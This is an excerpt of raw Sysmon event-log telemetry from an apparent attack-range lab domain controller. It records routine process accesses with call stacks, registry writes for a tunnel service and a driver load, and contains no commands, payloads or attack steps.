09:20:01.154{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001052824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001052823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001052822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.139{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.139{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001052818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001052817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.107{5EBD8912-8CC0-6151-1600-00000000FD01}12962024C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.092{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.092{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.092{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.076{5EBD8912-8CC0-6151-1000-00000000FD01}4401640C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 644600x80000000000000001052810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:28.685C:\Windows\System32\drivers\ena.sysMD5=C593555FD929A6FA925129109C08FC65,SHA256=5ADD00C93BE0C3E978DA48DED964A54F730B40F98C72D3F6145D79E3BFE8364D,IMPHASH=FB370D8374B216430C11D17F479694B1trueAmazon Web Services, Inc.Valid 10341000x80000000000000001052809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.045{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.045{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.998{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.998{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.998{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.935{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.935{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 